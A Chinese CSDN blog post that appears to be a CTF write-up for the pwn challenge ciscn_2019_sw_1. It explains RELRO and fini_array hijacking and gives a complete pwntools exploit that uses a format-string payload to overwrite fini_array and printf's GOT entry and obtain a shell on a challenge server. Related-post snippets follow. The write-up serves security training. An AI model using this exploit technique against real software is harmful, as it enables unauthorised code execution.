ciscn_2019_sw_1(fmt劫持fini_array为main,获得一次循环)

最新推荐文章于 2023-09-22 15:39:55 发布
最新推荐文章于 2023-09-22 15:39:55 发布
阅读量550 收藏 6
点赞数
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/121302556
版权

ciscn_2019_sw_1:

请添加图片描述
主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9
先引用下:

  • 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写;
  • 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写;
  • 为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。
  • 程序在加载的时候,会依次调用init.array数组中的每一个函数指针,在结束的时候,依次调用fini.array中的每一个函数指针
  • 当程序出现格式化字符串漏洞,但是需要写两次才能完成攻击,这个时候可以考虑改写fini.array中的函数指针为main函数地址,可以再执行一次main函数。一般来说,这个数组的长度为1,也就是说只能写一个地址。

程序分析:

这边有个格式化字符串漏洞,长度限制64
请添加图片描述

大致步骤:

我们用格式字符串漏洞改写fini_array为main的地址,改写print_got为system_plt
(改写fini_array为main,就能无限循环
改写print_got为system_plt在第二次main填入/bin/sh就能getshell)

exp:

from pwn import *
local_file  = './ciscn_2019_sw_1'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',26724 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
def debug(cmd=''):
     gdb.attach(r,cmd)
#-----------------------------
_sys=0x804851b
command=0x08048640
system_plt=0x080483D0
fini_array0=0x0804979c
main=0x8048534
printf_got=0x0804989C
offest=4
payload=p32(printf_got+2)+p32(fini_array0+2)+p32(printf_got)+p32(fini_array0)
payload+='%'+str(0x0804-0x10)+'c%4$hn'+'%5$hn'+'%'+str(0x83d0-0x0804)+'c%6$hn'+'%'+str(0x8534-0x83d0)+'c%7$hn'
sla('Welcome to my ctf! What\'s your name?\n',payload)
sl('/bin/sh\x00')
#debug()
r.interactive()

其他:

记一下怎么找fini_array的地址
在这里插入图片描述
在这里插入图片描述
或者用
elf.sym[’__init_array_end’]
请添加图片描述

Nq0inaen
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FMT.rar_FMT_FMT matlab_The Number_filter coefficient
09-22
this code is used to implement FMT Filter bank trancsiver in matlab. the filter coefficient can be changed also the number of subcarriers.
ciscn_2019_sw_1(fmt改fini_array无限循环
wuyvle的博客
04-30 1422
很明显的格式化漏洞,但是printf只能用一次 我们可以修改fini_array 简单地说,在main函数前会调用.init段代码和.init_array段的函数数组中每一个函数指针。同样的,main函数结束后也会调用.fini段代码和.fini._arrary段的函数数组中的每一个函数指针。 而我们的目标就是修改.fini_array数组的第一个元素为start或者main函数地址。需要注意的是,这个数组的内容在再次从start开始执行后又会被修改,且程序可读取的字节数有限,因此需要一次性修改两个地址并且
(格式化字符串漏洞).fini.array劫持,使程序流程循环进行
半岛铁盒的博客
04-04 834
用gdb调试main函数的时候,不难发现main的返回地址是__libc_start_main也就是说main并不是程序真正开始的地方,__libc_start_main的执行是在main的前面。 可以发现__libc_start_main函数的参数中,有3个是函数指针: 其中__libc_csu_fini是在main执行完毕后执行的 简单地说,在main函数后会调用.init段代码和.init_array段的函数数组中每一个函 数指针。而我们的目标就是修改.fini_array数组的第一个元素为star
BUUCTF之“ciscn_2019_sw_1”
Probeginner的博客
12-26 652
通过fmt改fini_arraymain,更加深入理解程序执行
ciscn_2019_sw_1
z1r0的博客
02-21 723
ciscn_2019_sw_1 查看保护 这里有一个格式化漏洞,但是呢这里只能一次。这里学到了一个新姿势在程序结束的时候有一个fini.array段运行。这时将 fini.array[0]的地址改为main函数地址这样就可以运行两次了。这样的话改printf为system之后第二次传入bin/sh即可getshell。 from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0'
[BUUCTF-pwn]——ciscn_2019_sw_1
Y_peak的博客
04-03 453
[BUUCTF-pwn]——ciscn_2019_sw_1 一个简单的格式化字符串, 相信大家看到旁边 的system和格式化字符串漏洞,想的一定是利用格式化字符串漏洞将printf_got表修改system_plt表,然后使其循环调用main第二次输入’/bin/sh’就好 可能唯一需要说一下的就是, 程序结束时会调用_fini_array指向的函数指针,所以我们将其修改为mian就会循环调用了 算下偏移, 一看就是4 exploit from pwn import * p = remote("no
Ciscn_2019_sw1<fini_array
m0_55906008的博客
09-22 145
​ 在执行main函数之前会调用init_array里的函数,在执行完main函数之后调用fini_array里的函数,因此这道题思路为通过第一次printf劫持printf的got表为system的函数地址,劫持fini_addr为main函数的地址,第二次输入"/bin/sh\x00",当执行到printf(“/bin/sh\x00”)时,由于劫持为system函数,因此执行system(“/bin/sh\x00”),拿到shell。
FMT.rar_FMT_VHDL 数字频率计_数字频率计
09-20
基于vhdl设计的数字频率计,后面还加了个与fpga通信的模块
FMT0371_V100.rar_2.5tft_FMT03_东芝
07-14
东芝的的2.5tft屏幕资料,谢谢,谢谢。
AV_SAMPLE_FMT_FLTP转为AV_SAMPLE_FMT_S16P(ffmpeg)
03-09
S16P(ffmpeg),在使用ffmpeg解码aac的时候,如果使用avcodec_decode_audio4函数解码,那么解码出来的会是AV_SAMPLE_FMT_FLTP 格式的数据( float, 4bit , planar), 如果我们希望得到16bit的数据(如AV_SAMPLE_FMT_S16...
fmt.rar_FM_FMT_in
07-14
fm signal in matlab code
ciscn_2019_sw_1 Writeup
Calllin的博客
05-11 469
前提 RELRO防御策略是当RELRO保护: 为NO RELRO的时候,init.array、fini.array、got.plt均可读可写 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写 为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。 linux程序运行时: 在加载的时候,会依次调用init.array数组中的每一个函数指针 在结束的时候,依次调用fini.array中的每一个函数
通过利用fini_array部署并启动ROP攻击 | TaQini
HiTaQini
05-08 1209
这篇文章源自pwnable.tw上的一道题目3x17,其中用到了fini_array劫持,比较有意思,于是写篇文章分析记录总结一下关于fini_array的利用方式~
ciscn_2019_s_1
doudoudedi
06-29 717
思路 通过off by null写key值然后unlink写bss段再次double free写free_hook即可拿到shell exp: from pwn import * #p=process('./ciscn_s_1') p=remote('node3.buuoj.cn',26429) elf=ELF('./ciscn_s_1') libc=elf.libc def add(idx,size,data): p.sendlineafter('show','1') p.sendlineafte
x_nuca_2018_offbyone2(off by null,unlink造成doublefree)
m0_51251108的博客
11-19 3182
x_nuca_2018_offbyone2: 在第七页挑了个题目做,好像不是很难 检查一下,got表可写 漏洞分析: 有个off by null 这题还有输出函数,挺好做的 利用思路: 1.利用off by null 造成unlink使指针数组中,由两个指针指向同一块地方 造成doublefree,我们再顺便泄露了libc 2.劫持free_hook为system,释放填有binsh的那个chunk就getshell了 exp: from pwn import * #from LibcSearcher i
BUUCTF刷题3
m0_51251108的博客
05-26 2733
题目:pwnable_start:wustctf2020_closed:hitcontraining_heapcreator:0ctf_2017_babyheap:ciscn_2019_es_7:jarvisoj_level5:hitcontraining_bamboobox: pwnable_start: 关键词: 汇编,泄露ebp,调试 思路: 1.查看汇编代码得知题目信息,发现read处可0x14后可溢出 2.依靠其中的write,是根据esp来确定打印addr,选择覆盖ret地址为write那里,便
2022NewStarCTF pwn大部分题解
m0_51251108的博客
11-18 1704
今年9~10月的比赛,题目从易到难,知识面广,还是很不错的,复现一下这比赛的pwn
pwnlib.exception.PwnlibException: Could not find ‘as‘ installed for ContextType报错解决
m0_51251108的博客
09-20 1645
做arm架构下的pwn题某个报错
av_sample_fmt_s16p转av_sample_fmt_fltp
最新发布
11-28
av_sample_fmt_s16p是一个表示音频样本格式为16位整数的枚举类型,而av_sample_fmt_fltp是一个表示音频样本格式为32位浮点数的枚举类型。在转换av_sample_fmt_s16p到av_sample_fmt_fltp的过程中,主要涉及到音频样本...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值